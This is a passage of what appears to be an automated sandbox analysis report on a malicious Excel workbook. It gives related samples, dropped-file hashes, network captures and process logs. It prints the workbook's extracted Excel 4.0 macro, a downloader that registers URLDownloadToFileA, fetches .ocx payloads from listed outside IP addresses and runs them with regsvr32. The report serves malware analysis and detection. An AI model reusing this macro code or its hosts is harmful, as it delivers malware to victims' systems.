                                                                                                                                              c2nfo64gHQ.exeGet hashmaliciousBrowse
                                                                                                                                              • 95.181.163.181
                                                                                                                                              MAKONIXLVClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.78
                                                                                                                                              REJC-688189380-Nov-25.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.127.80
                                                                                                                                              REJC-688189380-Nov-25.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.127.80
                                                                                                                                              51160ae1edfcf45c5e3e6e1bedc4a5bdcfc27d5e23cb0.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.98
                                                                                                                                              New Order Contract No 44322465.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.89
                                                                                                                                              ttIfPeM79u.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.127.214
                                                                                                                                              FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              1D40F773FC7559E478572A30D1CDB0436E1FD792.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              H-Fortnite.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              FOXHACK.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              AlingWare.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              MinecraftHackV1.8.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              bbXJN4YEIq.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              WjmYak325l.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.100
                                                                                                                                              RpcNs4.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.86.148.68
                                                                                                                                              y2N49ht6t4.exeGet hashmaliciousBrowse
                                                                                                                                              • 95.215.45.188
                                                                                                                                              OVHFRClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78
                                                                                                                                              reg.exeGet hashmaliciousBrowse
                                                                                                                                              • 213.186.33.5
                                                                                                                                              REQUEST FOR SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                                                              • 213.251.158.218
                                                                                                                                              ETgVKIYRW5.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              ETgVKIYRW5.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              2iJBYBel22.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              2iJBYBel22.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              Tender SN980018277 & SN9901827 Signed Copy.exeGet hashmaliciousBrowse
                                                                                                                                              • 51.161.104.181
                                                                                                                                              Invoice.exeGet hashmaliciousBrowse
                                                                                                                                              • 54.38.220.85
                                                                                                                                              AegEywmjUJ.exeGet hashmaliciousBrowse
                                                                                                                                              • 51.79.99.124
                                                                                                                                              P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 51.79.99.124
                                                                                                                                              DC-330NC.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 51.79.99.124
                                                                                                                                              FILE_915494026923219.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 158.69.222.101
                                                                                                                                              UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                                                                              • 158.69.222.101
                                                                                                                                              UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                                                                              • 158.69.222.101

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3AC5173B-BE2E-4080-B9F2-503317BAB84A
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):140193
                                                                                                                                              Entropy (8bit):5.357953481505316
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:icQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:KuQ9DQW+zYXfH
                                                                                                                                              MD5:EF352F7957FB2A087B0C5D550D8A6B21
                                                                                                                                              SHA1:BDF89F20B894277627536242794C7288101F32B7
                                                                                                                                              SHA-256:5EF3669A1B9DD219F8D648207C4079AC1861108BAC2E744D7D2BDCBABD5C276E
                                                                                                                                              SHA-512:CEEA5FAC3C9B7DB848BF565007B9E71EA5778FDF91D19E1BAACFE5CD812172C70310DD1CC0DF4765B1968F3C6890741D5EE2FB68141379BE7A4B32E2AAB5E04B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T16:29:09">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1E7802D5.jpg
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1098x988, frames 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):85681
                                                                                                                                              Entropy (8bit):7.915850776614707
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit
                                                                                                                                              MD5:4F100E2CEFED046B44EC799015B454EF
                                                                                                                                              SHA1:5149E5D1B5212C77B3548914E9B47D67B4BEA574
                                                                                                                                              SHA-256:D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C
                                                                                                                                              SHA-512:153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                              C:\Users\user\Desktop\ClaimCopy-1848214335-12022021.xlsb (copy)
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):99463
                                                                                                                                              Entropy (8bit):7.8306717981031575
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:IhyB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUy+x:Inc6EehCfCZpUHKGXbBKsiiY
                                                                                                                                              MD5:2E622D58F7398008879E0DD5739E42FF
                                                                                                                                              SHA1:317CEC6EE2A5FC0DD4569669961244484F11EDAB
                                                                                                                                              SHA-256:A762C9418E5E1252EE2D08CFB7519782ED0244EBF2BEC27CEEF19C4D9F9D09F3
                                                                                                                                              SHA-512:C181267DDA8C4BF64C4440E82F70EF8DE10126E64ECE0DC9B9EF80898E50531ACEE48E8D3438F74AAB986B48BA2C48EABBCF832466DBE644B2CD75713D930F90
                                                                                                                                              Malicious:true
                                                                                                                                              Reputation:low
                                                                                                                                              C:\Users\user\Desktop\D1330000
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):99463
                                                                                                                                              Entropy (8bit):7.8306717981031575
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:IhyB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUy+x:Inc6EehCfCZpUHKGXbBKsiiY
                                                                                                                                              MD5:2E622D58F7398008879E0DD5739E42FF
                                                                                                                                              SHA1:317CEC6EE2A5FC0DD4569669961244484F11EDAB
                                                                                                                                              SHA-256:A762C9418E5E1252EE2D08CFB7519782ED0244EBF2BEC27CEEF19C4D9F9D09F3
                                                                                                                                              SHA-512:C181267DDA8C4BF64C4440E82F70EF8DE10126E64ECE0DC9B9EF80898E50531ACEE48E8D3438F74AAB986B48BA2C48EABBCF832466DBE644B2CD75713D930F90
                                                                                                                                              Malicious:false
                                                                                                                                              C:\Users\user\Desktop\D1330000:Zone.Identifier
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):26
                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                              C:\Users\user\Desktop\~$ClaimCopy-1848214335-12022021.xlsb
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):165
                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                              Malicious:true
                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                              Entropy (8bit):7.831014565818071
                                                                                                                                              TrID:
                                                                                                                                              • Microsoft Excel Office Binary workbook document (40504/1) 83.51%
                                                                                                                                              • ZIP compressed archive (8000/1) 16.49%
                                                                                                                                              File name:ClaimCopy-1848214335-12022021.xlsb
                                                                                                                                              File size:99677
                                                                                                                                              MD5:08dbf91f6a89fdb8dcd18dfe657147f3
                                                                                                                                              SHA1:990b5abe4b156c201174e412aca4b3dcb372070c
                                                                                                                                              SHA256:29db2ea5fcb6ab8fca34ee80ae3a9c2ebda224ee631d754208ec53bc2b610267
                                                                                                                                              SHA512:e2b04a6f333013fbd641d32f1abb99ec92d30a38d8685a83801d8f75627ba4e3d35cf261aec6cf2100d9bc23e8aeb6cd735104855309b46a82c7546eca83944b
                                                                                                                                              SSDEEP:1536:xMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:dc6EehCfCZpUHKGXbBKsiiOp

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "ClaimCopy-1848214335-12022021.xlsb"

                                                                                                                                              Indicators

                                                                                                                                              Has Summary Info:
                                                                                                                                              Application Name:
                                                                                                                                              Encrypted Document:
                                                                                                                                              Contains Word Document Stream:
                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                              Flash Objects Count:
                                                                                                                                              Contains VBA Macros:

                                                                                                                                              Macro 4.0 Code

                                                                                                                                              8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
                                                                                                                                              9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
                                                                                                                                              10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
                                                                                                                                              11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
                                                                                                                                              12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
                                                                                                                                              13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
                                                                                                                                              15,6,=EXEC("regsvr32  C:\ProgramData\Volet1.ocx")
                                                                                                                                              16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
                                                                                                                                              17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
                                                                                                                                              18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet4.ocx")
                                                                                                                                              19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet5.ocx")
                                                                                                                                              20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet6.ocx")
                                                                                                                                              23,6,=HALT()
                                                                                                                                              
                                                                                                                                              1,1,523
                                                                                                                                              4,9,34543
                                                                                                                                              4,12,43
                                                                                                                                              5,2,ui
                                                                                                                                              5,9,7
                                                                                                                                              5,14,43
                                                                                                                                              6,14,36
                                                                                                                                              7,0,ug
7,1,еу5цу5
                                                                                                                                              8,9,34
                                                                                                                                              8,10,5
                                                                                                                                              9,1,y
                                                                                                                                              9,16,346
                                                                                                                                              10,7,rt
                                                                                                                                              10,8,345
                                                                                                                                              10,9,u
                                                                                                                                              11,2,23
                                                                                                                                              11,7,ertertyh57s5ry
                                                                                                                                              11,11,5
                                                                                                                                              11,12,35
                                                                                                                                              12,1,65
                                                                                                                                              12,2,7
                                                                                                                                              12,9,r67
                                                                                                                                              13,2,mfy
                                                                                                                                              13,7,65
                                                                                                                                              13,10,7
                                                                                                                                              13,14,34
                                                                                                                                              13,15,543
                                                                                                                                              14,0,uh
                                                                                                                                              14,1,y
                                                                                                                                              15,0,7
                                                                                                                                              15,7,65
                                                                                                                                              15,10,ae46
                                                                                                                                              16,2,d7
                                                                                                                                              16,3,uRl
17,3,="Mon"
                                                                                                                                              17,9,dt
                                                                                                                                              17,10,6
                                                                                                                                              17,12,u
                                                                                                                                              17,13,5
18,3,="URLDownloadTo"
                                                                                                                                              18,8,yu
                                                                                                                                              18,10,sb
                                                                                                                                              18,14,5
19,3,="JJCCBB"
                                                                                                                                              19,7,f
                                                                                                                                              20,0,7
                                                                                                                                              20,1,7
                                                                                                                                              20,4,185.82.126.78/
                                                                                                                                              20,7,523
                                                                                                                                              20,8,u
                                                                                                                                              21,0,md
                                                                                                                                              21,4,158.69.133.78/
                                                                                                                                              21,6,=RANDBETWEEN(142536473,988879789754)
                                                                                                                                              21,9,s
                                                                                                                                              21,11,m
                                                                                                                                              22,1,7
                                                                                                                                              22,4,45.142.211.62/
22,6,=".dat"
                                                                                                                                              22,8,6
                                                                                                                                              23,4,45.142.211.62/
23,6,=".dat2"
                                                                                                                                              23,11,4
                                                                                                                                              23,15,46
                                                                                                                                              24,4,185.82.126.78/
24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9)
                                                                                                                                              24,8,23
                                                                                                                                              24,14,6
                                                                                                                                              24,15,43
                                                                                                                                              25,1,567
                                                                                                                                              25,4,158.69.133.78/
                                                                                                                                              25,10,23
                                                                                                                                              25,13,5
                                                                                                                                              28,2,756
                                                                                                                                              37,6,=GOTO(Tiposa1!G8)
                                                                                                                                              

                                                                                                                                              Network Behavior

                                                                                                                                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/02/21-17:20:33.818022 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22
12/02/21-17:20:34.462758 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22
12/02/21-17:20:37.721969 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22
12/02/21-17:20:37.918223 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22
12/02/21-17:20:38.051804 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22
12/02/21-17:20:43.124756 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets


                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • 185.82.126.78
                                                                                                                                              • 158.69.133.78
                                                                                                                                              • 45.142.211.62

                                                                                                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49746 | 185.82.126.78 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 17:29:12.937355042 CET | 1280 | OUT | GET /337591964609.dat HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 185.82.126.78
                                                                                                                                              Connection: Keep-Alive
Dec 2, 2021 17:29:13.063477039 CET | 1281 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:13 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Dec 2, 2021 17:29:17.160629988 CET | 1285 | OUT | GET /337591964609.dat2 HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 185.82.126.78
                                                                                                                                              Connection: Keep-Alive
Dec 2, 2021 17:29:17.301106930 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49747 | 158.69.133.78 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 17:29:13.177581072 CET | 1281 | OUT | GET /337591964609.dat HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 158.69.133.78
                                                                                                                                              Connection: Keep-Alive
Dec 2, 2021 17:29:13.677134037 CET | 1282 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:13 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Dec 2, 2021 17:29:17.304251909 CET | 1287 | OUT | GET /337591964609.dat2 HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 158.69.133.78
                                                                                                                                              Connection: Keep-Alive
Dec 2, 2021 17:29:17.824084044 CET | 1287 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49748 | 45.142.211.62 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 17:29:16.727348089 CET | 1283 | OUT | GET /337591964609.dat HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 45.142.211.62
                                                                                                                                              Connection: Keep-Alive
Dec 2, 2021 17:29:16.965200901 CET | 1284 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 2, 2021 17:29:16.976291895 CET | 1284 | OUT | GET /337591964609.dat2 HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 45.142.211.62
                                                                                                                                              Connection: Keep-Alive
Dec 2, 2021 17:29:17.156666040 CET | 1285 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 02 Dec 2021 16:29:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 548
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              Behavior

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Start time:17:29:06
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                              Imagebase:0x380000
                                                                                                                                              File size:27110184 bytes
                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:17:29:16
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 C:\ProgramData\Volet1.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:17:29:18
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 C:\ProgramData\Volet2.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
